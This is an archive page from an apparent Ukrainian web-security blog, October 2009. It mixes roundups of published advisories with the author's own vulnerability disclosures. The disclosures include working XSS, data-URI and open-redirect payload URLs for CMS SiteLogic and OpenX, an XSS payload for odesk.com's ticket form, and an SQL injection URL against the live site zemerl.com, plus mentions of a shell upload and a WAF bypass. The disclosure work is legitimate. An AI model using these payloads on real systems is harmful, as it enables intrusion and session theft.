Архів для категорії 'Уразливості'

Нові уразливості в CMS SiteLogic

23:54 10.10.2009

У січні, 16.01.2009, я знайшов Cross-Site Scripting уразливість, а 06.04.2009 ще Command Execution уразливість в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

XSS:

http://site/?mid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Command Execution:

Можливе завантаження довільних файлів (shell upload) через модуль “Банерна система” в адмінці.

Добірка уразливостей

16:14 10.10.2009

В даній добірці уразливості в веб додатках:

  • Computer Associates Alert Notification Service Multiple RPC Buffer Overflow Vulnerabilities (деталі)
  • CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Vulnerabilities (деталі)
  • Madrese-Portal Sql Injection (деталі)
  • ViArt Shopping Cart v3.5 Multiple Remote Vulnerabilities (деталі)
  • Joomla Component mdigg 2.2.8 Blind SQL Injection Exploit (деталі)
  • New phppgadmin packages fix several vulnerabilities (деталі)
  • PsychoStats v3.1 XSS (деталі)
  • Multiple directory traversal vulnerabilities in AIST NetCat (деталі)
  • Altiris Deployment Solution - SQL Injection (деталі)
  • Altiris Deployment Solution - Domain Account Disclosure (деталі)

Добірка уразливостей

16:23 08.10.2009

В даній добірці уразливості в веб додатках:

Нові уразливості на www.odesk.com

20:11 07.10.2009

16.07.2009

У листопаді, 11.11.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation та Abuse of Functionality уразливості на проекті http://www.odesk.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.odesk.com.

Детальна інформація про уразливості з’явиться пізніше.

07.10.2009

XSS (IE):

POST запит на сторінці https://www.odesk.com/ticket.php

" style="xss:expression(alert(document.cookie))"В полях: Name, oDesk Username, Email.

Insufficient Anti-automation:

https://www.odesk.com/ticket.php

https://www.odesk.com/ticket.php?key=~~1472bcfe1c8803e1

На даних формах немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

https://www.odesk.com/ticket.php

https://www.odesk.com/ticket.php?key=~~1472bcfe1c8803e1

Враховуючи те, що з даних форм емайл відправляється також на заданий емайл користувача, то окрім розсилання спаму власникам сайта, також можна розсилати спам на довільні емайли.

Дані уразливості досі не виправлені.

Добірка уразливостей

16:21 06.10.2009

В даній добірці уразливості в веб додатках:

  • CiscoWorks Common Services Arbitrary Code Execution Vulnerability (деталі)
  • Fresta, CelerBB 0.0.2 Multiple Vulnerabilities (деталі)
  • IBM Lotus Sametime Community Services Multiplexer Stack Overflow Vulnerability (деталі)
  • EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability (деталі)
  • LittleCMS vulnerability (деталі)
  • Joomla: Session hijacking vulnerability, CVE-2008-4122 (деталі)
  • Численні уразливості в Phpclanwebsite <= 1.23.3 Fix Pack #5 (деталі)
  • Oracle E-Business Suite Business Intelligence SQL Injection Vulnerability (деталі)
  • Nagios vulnerability (деталі)
  • POC for CVE-2008-5619 (roundcubemail PHP arbitrary code injection) (деталі)

Уразливість на webfile.ru

23:56 03.10.2009

У лютому, 08.02.2009, я знайшов Cross-Site Scripting уразливість на сайті http://webfile.ru (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.

XSS:

Нові уразливості в OpenX

20:06 03.10.2009

01.08.2009

У червні, 04.06.2009, я знайшов Denial of Service, Cross-Site Scripting та Redirector уразливості в OpenX (дану Redirector уразливість я зустрічав на сайтах ще в 2008 році). Це популярна локальна банерна система, що раніше називалася Openads. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в OpenX.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

03.10.2009

DoS (Looped DoS):

http://site/adclick.php

Уразливі вірогідно лише всі версії Openads.

XSS:

http://site/adclick.php?maxdest=javascript:alert(document.cookie)
http://site/adclick.php?dest=javascript:alert(document.cookie)

Працює в Mozilla, Firefox (до версії 3.0.9), IE6, Opera та Google Chrome. Уразливі вірогідно лише всі версії Openads, де використовується заголовок Refresh. В нових версіях (таких як OpenX v2.6.3) використовується заголовок Location і там можлива атака в браузерах Firefox та Opera.

http://site/adclick.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Інший редиректор, про який я вже писав, також уразливий для цієї атаки:

http://site/www/delivery/ck.php?dest=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Redirector:

http://site/adclick.php?maxdest=http://websecurity.com.ua
http://site/adclick.php?dest=http://websecurity.com.ua

Уразливі OpenX v2.6.3 та попередні версії та потенційно наступні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.1 та попередні версії.

Добірка уразливостей

16:13 02.10.2009

В даній добірці уразливості в веб додатках:

  • Cisco Content Switching Module Memory Leak Vulnerability (деталі)
  • vBook Login Application Cross-site Scripting Vulnerability (деталі)
  • SMART Board Whiteboard Directory Traversal Vulnerability (деталі)
  • ZNC: Privilege escalation (деталі)
  • phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS) (деталі)
  • nForum 1.5 Multiple SQL Injection (деталі)
  • TinX CMS 3.x SQL Injection Vulnerability (деталі)
  • UMI.CMS Cross-Site Scripting vulnerability (деталі)
  • Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass) (деталі)
  • F5 FirePass Content Inspection Management XSS (деталі)

Добірка уразливостей

17:27 30.09.2009

В даній добірці уразливості в веб додатках:

  • Sun Java System Active Server Pages Multiple Directory Traversal Vulnerabilities (деталі)
  • Sun Java System Active Server Pages Multiple Command Injection Vulnerabilities (деталі)
  • Sun Java System Active Server Pages Information Disclosure Vulnerability (деталі)
  • Meta Cart Free Database Disclosure (деталі)
  • facto Database Disclosure (деталі)
  • ASP-CMS v.1.0 Sql Injection/Database Disclosure (деталі)
  • Moodle 1.9.3 Remote Code Execution (деталі)
  • HP-UX Running System Administration Manager (SAM), Unintended Remote Access (деталі)
  • phpList vulnerability (деталі)
  • Multiple XSS Vulnerabilities in World Recipe 2.11 (деталі)

Уразливості на www.zemerl.com

20:03 29.09.2009

15.07.2009

У листопаді, 08.11.2008, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://www.zemerl.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.09.2009

SQL Injection:

http://www.zemerl.com/cgi-bin/search.pl?language=-1'%20or%20version()%3D5%20limit%200,1%23

XSS (через SQL Injection):

Дані уразливості досі не виправлені.

Зазначу, що в 2008 році WAF на сервері не було, а 15.07.2009 я виявив, що вони встановили ModSecurity. Але для XSS уразливості я його легко обійшов (своїм методом обхода WAF, який я розробив ще в 2006 році), а проти SQL Injection уразливості ModSecurity взагалі не спрацював.